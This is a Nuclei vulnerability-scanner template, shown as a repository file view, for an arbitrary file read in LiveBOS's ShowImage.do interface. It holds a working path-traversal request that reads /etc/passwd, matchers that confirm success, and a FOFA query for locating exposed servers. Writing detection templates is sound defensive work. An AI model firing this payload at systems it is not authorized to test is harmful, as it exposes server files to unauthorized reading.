nuclei-templates/http/vulnerabilities/other/livebos-file-read.yaml

35 lines
1.1 KiB
YAML
Raw Normal View History

2023-10-24 10:30:01 +00:00
id: livebos-file-read
info:
name: LiveBOS ShowImage.do - Arbitrary File Read
author: yusakie
severity: high
description: |
An arbitrary file read vulnerability exists in the LiveBOS ShowImage.do interface, which can be exploited to obtain sensitive files from the server.
reference:
- https://www.wevul.com/2301.html
metadata:
verified: "true"
max-request: 2
fofa-query: app="LiveBOS-框架" && body="管理控制台"
2023-10-24 10:30:01 +00:00
tags: livebos,lfi
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /feed/ShowImage.do;.js.jsp?type=&imgName=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_1, "Power by LiveBOS")
- regex('root:.*:0', body_2)
- status_code_2 == 200
condition: and
# digest: 4a0a00473045022052e0789e593dcbe4e86aec8e328934880655845e4f1c72376c3e48226e2c6f2a022100ae02e69172e16ab8fd1ebcf966fe6310d28247aa1b23e60e25ee144dbf091fa4:922c64590222798bb761d5b6d8e72950